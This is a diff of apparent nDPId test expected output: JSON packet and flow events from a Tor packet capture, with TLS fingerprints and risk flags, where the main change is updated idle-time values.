+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383821665420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665420,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A15AAIAGe0DAqAH8W49d8semAbvp\/8nSAAAAAIACIABVtgAAAgQFtAEDAwgBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383821665491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665491,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x6b4Wbj86f\/J04ASOQiLRwAAAgQFtAEBBAIBAwMH"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383821665491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821665491,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA19AAIAGe0vAqAH8W49d8semAbvp\/8nT+Fm4\/VAQAQAEIgAAAAAAAAAA"} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01160{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":25,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821666212} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821666164,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821666407,"flow_last_seen":1383821666407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821666407,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1383821666407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666407,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A2hAAIAG0l3AqAH8Ljs0H8enAbvpjJYYAAAAAIACIADhCQAAAgQFtAEDAwgBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1383821666480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666480,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAACwGKcYuOzQfwKgB\/AG7x6cxNPZ86YyWGYASchBnNQAAAgQFtAEBBAIBAwMK"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1383821666481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821666481,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA2lAAIAG0mjAqAH8Ljs0H8enAbvpjJYZMTT2fVAQAQAZGwAAAAAAAAAA"} -01195{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821666407,"flow_last_seen":1383821666407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821666407,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1383821666407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666407,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A2hAAIAG0l3AqAH8Ljs0H8enAbvpjJYYAAAAAIACIADhCQAAAgQFtAEDAwgBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1383821666480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666480,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAACwGKcYuOzQfwKgB\/AG7x6cxNPZ86YyWGYASchBnNQAAAgQFtAEBBAIBAwMK"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1383821666481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821666481,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA2lAAIAG0mjAqAH8Ljs0H8enAbvpjJYZMTT2fVAQAQAZGwAAAAAAAAAA"} +01195{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":55,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821668212} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821668066,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821668403,"flow_last_seen":1383821668403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821668403,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1383821668403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668403,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A3VAAIAGx5DAqAH8JuVGNceoAbuUs9YxAAAAAIACIADrCAAAAgQFtAEDAwgBAQQC"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1383821668547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668547,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x6iEDREglLPWMoASOQg8wAAAAgQFtAEBBAIBAwMK"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821668548,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA3ZAAIAGx5vAqAH8JuVGNceoAbuUs9YyhA0RIVAQAQC1nQAAAAAAAAAA"} -01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821668403,"flow_last_seen":1383821668403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821668403,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1383821668403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668403,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A3VAAIAGx5DAqAH8JuVGNceoAbuUs9YxAAAAAIACIADrCAAAAgQFtAEDAwgBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1383821668547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668547,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x6iEDREglLPWMoASOQg8wAAAAgQFtAEBBAIBAwMK"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1383821668548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821668548,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA3ZAAIAGx5vAqAH8JuVGNceoAbuUs9YyhA0RIVAQAQC1nQAAAAAAAAAA"} +01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":80,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821670213} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":80,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821669834,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":83,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821672213} @@ -102,8 +102,8 @@ 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1383821733324,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1383821733324,"pkt":"\/\/\/\/\/\/\/\/UlQAwqwfCABFAACsAABAAEARtfDAqAEBwKgB\/0RcRFwAmDDeeyJob3N0X2ludCI6IDY3Njg3OTk3NiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICI2NzY4Nzk5NzYiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsxNjc4NDEyMTYsIDE4MTA4Mzk2OCwgMTgxMDgwMzI0LCAyOTU0NDE3M119"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":671,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821734213} 00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":671,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821734087,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383821734359,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821734359,"pkt":"UlQA2EYhUlQAWul3CABFAAAoBE1AAIAGeHjAqAH8nTgeLsegAbuzcgvfGiCX\/lAUAAD2+QAAAAAAAAAA"} 